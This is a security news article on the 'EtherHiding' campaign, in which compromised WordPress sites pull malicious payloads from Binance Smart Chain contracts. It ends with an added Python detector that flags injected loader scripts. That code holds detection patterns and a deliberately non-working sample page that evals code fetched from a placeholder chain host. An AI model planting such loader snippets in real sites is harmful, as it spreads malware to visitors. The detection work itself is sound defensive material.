Hackers can now hide malicious code in Web3 smart contracts

 


Hackers have devised a novel way to embed malicious code in Binance smart contracts to steal partial payments from blockchain contracts.

Dubbed “EtherHiding” by Guardio Labs researchers, the attack involves compromising WordPress websites by implanting code that retrieves partial payloads from blockchain contracts, subsequently deploying these payloads within Binance Smart Chain (BSC) smart contracts. These smart contracts effectively function as clandestine, anonymous hosting platforms for malicious code.

EtherHiding is said to be an evolution of a “fake-update” malware propagation campaign named “ClearFake,” in which the attackers inserted concealed JS code into compromised WordPress sites. This code allowed the campaign operators to remotely and instantly change attack methods and display any message they desired, such as overlays demanding a browser update, ultimately resulting in malware infection.

According to the researchers, EtherHiding’s flexibility enables hackers to modify the attack chain with each new blockchain transaction, making it challenging to mitigate.

“Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted ‘on-chain’ without the ability for a takedown,” the researchers noted. “This is what we see here in this attack — malicious code is hosted and served in a manner that can’t be blocked.”

Once a smart contract is deployed on BSC, it operates autonomously. Binance can’t just “shut it down.” The only thing the company can do, and currently offers, is the ability for the community and developers to be warned about a contract if it is identified as malicious or part of an illegal activity, Guardio Labs added.
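
Because the on-chain payload cannot be taken down, the place a site owner can still act is the injected script on the compromised WordPress page. The following Python check is an added example, not code from the article or from Guardio Labs: it flags inline scripts that both read from a blockchain node and execute dynamic code. The indicator patterns, the `scan_page` name, and the sample pages are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
# Heuristic indicators: assumptions for this example, not IoCs from the article.
FETCH = {  # signs that a script reads data from a blockchain node
    "json_rpc_eth_call": re.compile(r"\beth_call\b"),
    "bsc_rpc_host": re.compile(r"bsc-dataseed[\w.-]*", re.I),
    "contract_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}
# Signs that a script runs text it received as code.
EXECUTE = {"dynamic_eval": re.compile(r"\b(?:eval|Function)\s*\(")}

class ScriptCollector(HTMLParser):
    """Collects [src, inline body] for every <script> element."""
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = True
            self.scripts.append([dict(attrs).get("src"), ""])
    def handle_endtag(self, tag):
        if tag == "script":
            self._open = False
    def handle_data(self, data):
        if self._open:
            self.scripts[-1][1] += data

def scan_page(html):
    """Flag inline scripts that both read from a chain and execute dynamic code."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for index, (src, body) in enumerate(collector.scripts):
        fetch = sorted(n for n, rx in FETCH.items() if rx.search(body))
        execute = sorted(n for n, rx in EXECUTE.items() if rx.search(body))
        if fetch and execute:  # either signal alone is common on legitimate sites
            findings.append({"script": index, "src": src, "hits": fetch + execute})
    return findings

# Constructed, non-functional sample pages (loadFromChain is deliberately undefined).
COMPROMISED = """<html><head><script src="/wp-includes/js/jquery.js"></script>
<script>var q = {method: "eth_call", to: "0x0000000000000000000000000000000000000000"};
loadFromChain("https://bsc-dataseed.example.invalid", q, function (t) { eval(t); });</script>
</head></html>"""
BENIGN = """<html><body><script>rpc({method: "eth_call", params: []});</script>
<script>var cfg = eval("(" + legacyJson + ")");</script></body></html>"""
if __name__ == "__main__":
    for name, page in (("compromised", COMPROMISED), ("benign", BENIGN)):
        print(name, scan_page(page))
```

A hit is a prompt for manual review of that script and of how it got into the page, not proof of compromise; obfuscated loaders will not match these plain-text patterns.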
